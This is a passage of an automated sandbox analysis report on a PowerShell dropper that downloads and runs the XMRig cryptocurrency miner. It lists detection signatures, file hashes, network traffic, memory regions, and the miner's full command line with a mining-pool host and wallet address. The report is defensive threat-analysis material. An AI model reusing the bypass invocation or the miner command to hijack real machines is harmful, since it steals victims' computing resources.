memory/4788-62-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-63-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-64-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-65-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-66-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-67-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-68-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-69-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-70-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-71-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-72-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-73-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-74-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-75-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-76-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-77-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-78-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-79-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-80-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-81-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-82-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-83-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-84-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-85-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-86-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-87-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-88-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-89-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-90-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-91-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-92-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-93-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-94-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-95-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-96-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-97-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-98-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-99-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-100-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-101-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-102-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-103-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-104-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-105-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-106-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-107-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-108-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-109-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-110-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-111-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-112-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-113-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-114-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-115-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-116-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:59
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4660 wrote to memory of 3760 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4660 wrote to memory of 3760 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4236,i,1067197275908310731,12785105794523264014,262144 --variations-seed-version --mojo-platform-channel-handle=3852 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3912,i,1067197275908310731,12785105794523264014,262144 --variations-seed-version --mojo-platform-channel-handle=4132 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.111.78.13.in-addr.arpa | udp |
Files
memory/4660-0-0x00007FFBF90F3000-0x00007FFBF90F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4rb3t3ut.55z.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4660-10-0x00000245BF720000-0x00000245BF742000-memory.dmp
memory/4660-11-0x00007FFBF90F0000-0x00007FFBF9BB1000-memory.dmp
memory/4660-12-0x00007FFBF90F0000-0x00007FFBF9BB1000-memory.dmp
memory/4660-14-0x00007FFBF90F0000-0x00007FFBF9BB1000-memory.dmp
memory/4660-15-0x00000245C1940000-0x00000245C1952000-memory.dmp
memory/4660-16-0x00000245BF710000-0x00000245BF71A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3760-47-0x00000270B4FE0000-0x00000270B5000000-memory.dmp
memory/3760-48-0x00000270B5030000-0x00000270B5050000-memory.dmp
memory/3760-49-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-52-0x00000270B5050000-0x00000270B5070000-memory.dmp
memory/4660-51-0x00007FFBF90F3000-0x00007FFBF90F5000-memory.dmp
memory/3760-50-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/4660-53-0x00007FFBF90F0000-0x00007FFBF9BB1000-memory.dmp
memory/3760-54-0x00000270B5080000-0x00000270B50A0000-memory.dmp
memory/3760-55-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-56-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-57-0x00000270B5050000-0x00000270B5070000-memory.dmp
memory/3760-58-0x00000270B5080000-0x00000270B50A0000-memory.dmp
memory/3760-59-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-60-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-61-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-62-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-63-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-64-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-65-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-66-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-67-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-68-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-69-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-70-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-71-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-72-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-73-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-74-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-75-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-76-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-77-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-78-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-79-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-80-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-81-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-82-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-83-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-84-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-85-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-86-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-87-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-88-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-89-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-90-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-91-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-92-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-93-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-94-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-95-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-96-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-97-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-98-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-99-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-100-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-101-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-102-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-103-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-104-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-105-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-106-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-107-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-108-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-109-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-110-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-111-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-112-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-113-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-114-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-115-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-116-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-117-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:20
Platform
win10v2004-20240508-en
Max time kernel
1799s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2484 wrote to memory of 184 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2484 wrote to memory of 184 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.253.116.51.in-addr.arpa | udp |
Files
memory/2484-0-0x00007FF849CA3000-0x00007FF849CA5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hloxde3f.hkx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2484-10-0x0000022737E60000-0x0000022737E82000-memory.dmp
memory/2484-11-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp
memory/2484-12-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp
memory/2484-14-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp
memory/2484-15-0x0000022738210000-0x0000022738222000-memory.dmp
memory/2484-16-0x00000227381F0000-0x00000227381FA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/184-47-0x000002235A0D0000-0x000002235A0F0000-memory.dmp
memory/184-48-0x00000223EC140000-0x00000223EC160000-memory.dmp
memory/184-49-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/2484-50-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp
memory/184-53-0x00000223EC580000-0x00000223EC5A0000-memory.dmp
memory/2484-52-0x00007FF849CA3000-0x00007FF849CA5000-memory.dmp
memory/184-51-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-54-0x00000223EC7B0000-0x00000223EC7D0000-memory.dmp
memory/2484-55-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp
memory/184-56-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-58-0x00000223EC580000-0x00000223EC5A0000-memory.dmp
memory/184-57-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-59-0x00000223EC7B0000-0x00000223EC7D0000-memory.dmp
memory/184-60-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-61-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-62-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-63-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-64-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-65-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-66-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-67-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-68-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-69-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-70-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-71-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-72-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-73-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-74-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-75-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-76-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-77-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-78-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-79-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-80-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-81-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-82-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-83-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-84-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-85-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-86-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-87-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-88-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-89-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
